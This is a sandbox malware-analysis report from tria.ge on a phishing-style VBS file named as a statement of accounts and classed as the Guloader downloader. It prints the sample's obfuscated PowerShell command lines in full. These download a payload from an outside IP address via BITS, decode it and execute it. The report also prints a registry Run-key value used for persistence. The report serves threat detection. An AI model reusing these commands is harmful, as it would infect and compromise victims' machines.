Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
18/05/2023, 02:01
Static task
static1
Behavioral task
behavioral1
Sample
STatEment-of-Accounts-15th-mARCH-2023_ACCOUNT-SUMMARY_REF_QUTYT_125KB_0000000000000000000.vbs
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
STatEment-of-Accounts-15th-mARCH-2023_ACCOUNT-SUMMARY_REF_QUTYT_125KB_0000000000000000000.vbs
Resource
win10v2004-20230220-en
General
-
Target
STatEment-of-Accounts-15th-mARCH-2023_ACCOUNT-SUMMARY_REF_QUTYT_125KB_0000000000000000000.vbs
-
Size
31KB
-
MD5
58cba3aa60ed8857deb32d90c47660b1
-
SHA1
4cc7ea4c8fa38f54fe77185e6946ae71341c5bd3
-
SHA256
6ac3b02c068631d96b3fef677a7145b1d1d327af6f8b625f1536959bf69a1ab4
-
SHA512
3e718367014d6ffaefa2531f5fafc1cd3741d25b70298ce7caed2f83041b1ef4f947f90f53b827b3206d161fd19a6776c32f458b6e9e11128f2792640e14657a
-
SSDEEP
768:cuKPqBHxLXe21oomQdDPgl3nn4kFP7vdlrMpu6nq6S:FRxLu21oomQdcl3n4kFPH4DNS
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Run ieinstal.exe Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autogene = "%TORO% -w 1 $Datama=(Get-ItemProperty -Path 'HKCU:\\Leucorrhe\\').Dispaintob;%TORO% ($Datama)" ieinstal.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1700 ieinstal.exe 1700 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2228 powershell.exe 1700 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2228 set thread context of 1700 2228 powershell.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1816 powershell.exe 1816 powershell.exe 2228 powershell.exe 2228 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 2228 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1700 ieinstal.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2188 wrote to memory of 1816 2188 WScript.exe 83 PID 2188 wrote to memory of 1816 2188 WScript.exe 83 PID 1816 wrote to memory of 2228 1816 powershell.exe 85 PID 1816 wrote to memory of 2228 1816 powershell.exe 85 PID 1816 wrote to memory of 2228 1816 powershell.exe 85 PID 2228 wrote to memory of 1700 2228 powershell.exe 89 PID 2228 wrote to memory of 1700 2228 powershell.exe 89 PID 2228 wrote to memory of 1700 2228 powershell.exe 89 PID 2228 wrote to memory of 1700 2228 powershell.exe 89
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STatEment-of-Accounts-15th-mARCH-2023_ACCOUNT-SUMMARY_REF_QUTYT_125KB_0000000000000000000.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Photo9 ([String]$Prec){For($Velsesloka=1; $Velsesloka -lt $Prec.Length-1; $Velsesloka+=(1+1)){$alvorso=$alvorso+$Prec.Substring($Velsesloka, 1)};$alvorso;}$Overcarefu=Photo9 ' h tftmpS: /b/N9 1R.S2 4 4 .O1D9P7A.O9B/atVr uUmAmLpT/ R i c icn i nFeOeF.Es nRpG ';$alvorso01=Photo9 'siTewxH ';$Kabareter = Photo9 'T\ sCy s wRoIwU6 4G\SWPion dMoBwPsLPEo w e r S h eSlBl \ vk1G.S0U\ pSo wbeIr sphBe l l .ReAx eB ';.($alvorso01) (Photo9 'O$ CPeMlEe rPiSaVcds 2W=S$ eUn vR:NwEi n d iBr ') ;.($alvorso01) (Photo9 'S$TKMaFbQaSrSePtQeZr =C$TC e l e r iPa cas 2 +t$ K a bTaDrSe tpeRr ') ;.($alvorso01) (Photo9 'e$ BGrPnDeSoMp R=U R(P(PgTwTmpi SwLi n 3 2N_ pSr oMcbe s sR S- F PPrKoBcReus s ITds= $u{ PVIBD } ) .LC o mAmTaSn dSLQiGn eF)s I-Ds p lUi t S[Rc hTa rD] 3K4 ');.($alvorso01) (Photo9 'D$ pAu kLlT = r$SB r nReUo p [S$ B rFn eBoCpT. c oTuTn tf-h2 ] ');.($alvorso01) (Photo9 ' $ D i cSyJcBlMiOeCs cO=U(kTHess tc-UP aTt hA H$ KUa b aPrDeBtSeArP)P r-AA nFdA (V[DIAnMtiPFttrs]T:V: sGiUzRe S-BeAqU 8 ) ') ;if ($Dicycliesc) {.$Kabareter $pukl;} else {;$alvorso00=Photo9 'SSStIa rPt - BBi t sKTCrAa nUsWfTeSr -KSBoSuKrSc eT $SO vfe rCc a r eDfKuA S-CD e s tNiPnOaLtSiPo n L$FC eHl e rRiHaPcSs 2 ';.($alvorso01) (Photo9 'F$SC e lGe r i a cDs 2 =D$Te nOvT:VabpLp dDaKtPa ') ;.($alvorso01) (Photo9 ' I mOp o rJtI-SMUo dMu lSe CB i tTsOTSr a nAsDf eCrH ') ;$Celeriacs2=$Celeriacs2+'\Sinterin.Sli';while (-not $Tiercels) {.($alvorso01) (Photo9 'A$ TPiSeIrIcReRl s =a(STIeDsntO- P aPt hF $UC eDlSeCr iJa casd2 )D ') ;.($alvorso01) $alvorso00;.($alvorso01) (Photo9 ' S tba r tB- SFlHeCeNpU P5R ');}.($alvorso01) (Photo9 'I$FPPhUo tBoP S=S cG eftE- CIo nItDeTn tS R$PC ePl eKr i afcnsS2 ');.($alvorso01) (Photo9 ' $ SKaTcMhIaS P= S[ASWySsst e mG.DC oDnMvBe rItr]F: :PFIr o maBCaOsBeO6F4 SVt r iTnCg ( $ PShUoTt o )V ');.($alvorso01) (Photo9 'F$SaFlPv o rPsBoa2J =V [ SFyKs tUeLmD.ST e xRtB. EInHcBo d iPnSgP]B: :EALSHCaI IF. GIe t S trr i n g (T$sS aEc h a ) ');.($alvorso01) (Photo9 'M$ I m pBrKo vRi sDe = $FaBl vSoArss oA2L. s uPbTs tLr iBn gu( 1T8D5 0 2S7 ,r1A8 9 4O5 )F ');.($alvorso01) $Improvise;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Photo9 ([String]$Prec){For($Velsesloka=1; $Velsesloka -lt $Prec.Length-1; $Velsesloka+=(1+1)){$alvorso=$alvorso+$Prec.Substring($Velsesloka, 1)};$alvorso;}$Overcarefu=Photo9 ' h tftmpS: /b/N9 1R.S2 4 4 .O1D9P7A.O9B/atVr uUmAmLpT/ R i c icn i nFeOeF.Es nRpG ';$alvorso01=Photo9 'siTewxH ';$Kabareter = Photo9 'T\ sCy s wRoIwU6 4G\SWPion dMoBwPsLPEo w e r S h eSlBl \ vk1G.S0U\ pSo wbeIr sphBe l l .ReAx eB ';.($alvorso01) (Photo9 'O$ CPeMlEe rPiSaVcds 2W=S$ eUn vR:NwEi n d iBr ') ;.($alvorso01) (Photo9 'S$TKMaFbQaSrSePtQeZr =C$TC e l e r iPa cas 2 +t$ K a bTaDrSe tpeRr ') ;.($alvorso01) (Photo9 'e$ BGrPnDeSoMp R=U R(P(PgTwTmpi SwLi n 3 2N_ pSr oMcbe s sR S- F PPrKoBcReus s ITds= $u{ PVIBD } ) .LC o mAmTaSn dSLQiGn eF)s I-Ds p lUi t S[Rc hTa rD] 3K4 ');.($alvorso01) (Photo9 'D$ pAu kLlT = r$SB r nReUo p [S$ B rFn eBoCpT. c oTuTn tf-h2 ] ');.($alvorso01) (Photo9 ' $ D i cSyJcBlMiOeCs cO=U(kTHess tc-UP aTt hA H$ KUa b aPrDeBtSeArP)P r-AA nFdA (V[DIAnMtiPFttrs]T:V: sGiUzRe S-BeAqU 8 ) ') ;if ($Dicycliesc) {.$Kabareter $pukl;} else {;$alvorso00=Photo9 'SSStIa rPt - BBi t sKTCrAa nUsWfTeSr -KSBoSuKrSc eT $SO vfe rCc a r eDfKuA S-CD e s tNiPnOaLtSiPo n L$FC eHl e rRiHaPcSs 2 ';.($alvorso01) (Photo9 'F$SC e lGe r i a cDs 2 =D$Te nOvT:VabpLp dDaKtPa ') ;.($alvorso01) (Photo9 ' I mOp o rJtI-SMUo dMu lSe CB i tTsOTSr a nAsDf eCrH ') ;$Celeriacs2=$Celeriacs2+'\Sinterin.Sli';while (-not $Tiercels) {.($alvorso01) (Photo9 'A$ TPiSeIrIcReRl s =a(STIeDsntO- P aPt hF $UC eDlSeCr iJa casd2 )D ') ;.($alvorso01) $alvorso00;.($alvorso01) (Photo9 ' S tba r tB- SFlHeCeNpU P5R ');}.($alvorso01) (Photo9 'I$FPPhUo tBoP S=S cG eftE- CIo nItDeTn tS R$PC ePl eKr i afcnsS2 ');.($alvorso01) (Photo9 ' $ SKaTcMhIaS P= S[ASWySsst e mG.DC oDnMvBe rItr]F: :PFIr o maBCaOsBeO6F4 SVt r iTnCg ( $ PShUoTt o )V ');.($alvorso01) (Photo9 'F$SaFlPv o rPsBoa2J =V [ SFyKs tUeLmD.ST e xRtB. EInHcBo d iPnSgP]B: :EALSHCaI IF. GIe t S trr i n g (T$sS aEc h a ) ');.($alvorso01) (Photo9 'M$ I m pBrKo vRi sDe = $FaBl vSoArss oA2L. s uPbTs tLr iBn gu( 1T8D5 0 2S7 ,r1A8 9 4O5 )F ');.($alvorso01) $Improvise;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1700
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
184B
MD519e86664068c0827b0751a314c1c988d
SHA15e07b21d7ec3d1ec314722144975cbec666d8daa
SHA256f30699a8f8f664bd8b4ff21aa8dd5921a9a3a4f68d371cc35f4abc69c37cb9f8
SHA512e5d0fe87e900fcd3554aedd5330f7ca3f3426fa31a52ab7bcd89bdb24be279d1d12d29cb8914b10ca066219cdfb03636cae067432358ef44a09f72dddf255cbb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82